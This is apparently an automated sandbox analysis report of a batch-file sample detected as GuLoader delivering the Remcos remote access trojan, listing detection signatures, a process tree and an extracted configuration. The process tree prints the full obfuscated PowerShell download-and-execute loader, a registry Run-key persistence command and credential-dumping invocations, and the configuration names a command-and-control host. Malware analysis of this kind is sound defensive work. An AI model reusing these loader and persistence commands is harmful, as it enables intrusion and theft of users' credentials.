
Windows Analysis Report
LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat

Overview

General Information

Sample name:LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat
Analysis ID:1539161
MD5:79c452316f1b510462cf29f5fbbd84ba
SHA1:2f95ab9367e8ef18427e2a8568afffbe0f197f22
SHA256:4c697bdcbe64036ba8a79e587462960e856a37e3b8c94f9b3e7875aeb2f91959
Tags:batuser-lowmal3

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Powershell creates an autostart link
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 5772 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2912 cmdline: powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas 
$OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. 
';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes 
(Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6776 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO 
recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. 
';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes 
(Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 2996 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 6964 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2912 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 5932 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5884 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1936 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3476 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["pikolee.duckdns.org:51525:1"], "Assigned name": "power", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MC4T64", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author
00000005.00000002.2419273887.0000000008590000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
Source | Rule | Description | Author
amsi64_2912.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_6776.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Strings matched by INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC:
  • 0xc492:$b2: ::FromBase64String(
  • 0xb502:$s1: -join
  • 0x4cae:$s4: +=
  • 0x4d70:$s4: +=
  • 0x8f97:$s4: +=
  • 0xb0b4:$s4: +=
  • 0xb39e:$s4: +=
  • 0xb4e4:$s4: +=
  • 0x1541f:$s4: +=
  • 0x1549f:$s4: +=
  • 0x15565:$s4: +=
  • 0x155e5:$s4: +=
  • 0x157bb:$s4: +=
  • 0x1583f:$s4: +=
  • 0xbd30:$e4: Get-WmiObject
  • 0xbf1f:$e4: Get-Process
  • 0xbf77:$e4: Start-Process
  • 0x160c3:$e4: Get-Process

              System Summary

Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Forsnakket154
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6964, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", ProcessId: 2912, ProcessName: reg.exe
Source: Network Connection; Author: frack113: Data: DestinationIp: 104.21.56.189, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2996, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49846
Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2996, ParentProcessName: msiexec.exe, ProcessCommandLine: 